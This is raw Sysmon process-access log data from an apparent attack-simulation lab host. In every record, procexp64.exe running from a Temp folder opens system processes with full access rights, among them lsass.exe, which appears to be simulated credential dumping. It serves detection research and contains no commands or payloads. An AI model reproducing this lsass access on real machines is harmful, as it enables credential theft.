15:16:21.970{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1600-00000000A301}1528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788491Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:21.970{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1500-00000000A301}1480C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788490Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:21.970{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1400-00000000A301}1276C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788489Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:21.970{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1300-00000000A301}1200C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788488Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:21.970{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1200-00000000A301}1192C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788487Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:21.970{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1100-00000000A301}1160C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788486Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:21.970{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1000-00000000A301}1152C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788485Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:21.970{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0F00-00000000A301}1120C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788484Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:21.970{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0E00-00000000A301}1076C:\Windows\system32\LogonUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788483Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:21.970{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0D00-00000000A301}624C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788482Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:21.970{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0C00-00000000A301}584C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788481Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:21.970{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788480Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:21.970{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0A00-00000000A301}848C:\Windows\system32\services.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788479Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:21.970{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788478Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:21.970{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0800-00000000A301}720C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788477Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:21.970{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0700-00000000A301}712C:\Windows\system32\wininit.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788476Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:21.970{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1517-600B-0500-00000000A301}640C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788475Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:21.970{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0200-00000000A301}448C:\Windows\System32\smss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788474Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:21.970{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0100-00000000A301}4System0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788630Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:22.986{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1EBE-600B-A206-00000000A301}7468C:\Program Files\Notepad++\notepad++.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788629Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:22.986{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1E06-00000000A301}2936C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788628Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:22.986{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1D06-00000000A301}5472C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788627Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:22.986{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D92-600B-0806-00000000A301}4464C:\Windows\system32\fontdrvhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788626Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:22.986{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0706-00000000A301}7696C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788625Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:22.986{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0606-00000000A301}4952C:\Program Files\Internet Explorer\iexplore.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788624Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:22.986{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A401-00000000A301}5528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788623Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:22.986{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A101-00000000A301}5376C:\Windows\System32\rdpclip.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788622Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:22.986{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E0-600B-9701-00000000A301}2256C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788621Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:22.986{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9501-00000000A301}1036C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788620Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:22.986{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9401-00000000A301}5084C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788619Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:22.986{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A8-600B-E200-00000000A301}4204C:\Windows\System32\msdtc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788618Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:22.986{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A1-600B-DF00-00000000A301}3152C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788617Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:22.986{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-159B-600B-D600-00000000A301}2808C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788616Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:22.986{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-AC00-00000000A301}4656C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788615Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:22.986{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-A800-00000000A301}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788614Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:22.986{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152F-600B-5900-00000000A301}3940C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788613Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:22.986{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152E-600B-5500-00000000A301}3732C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788612Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 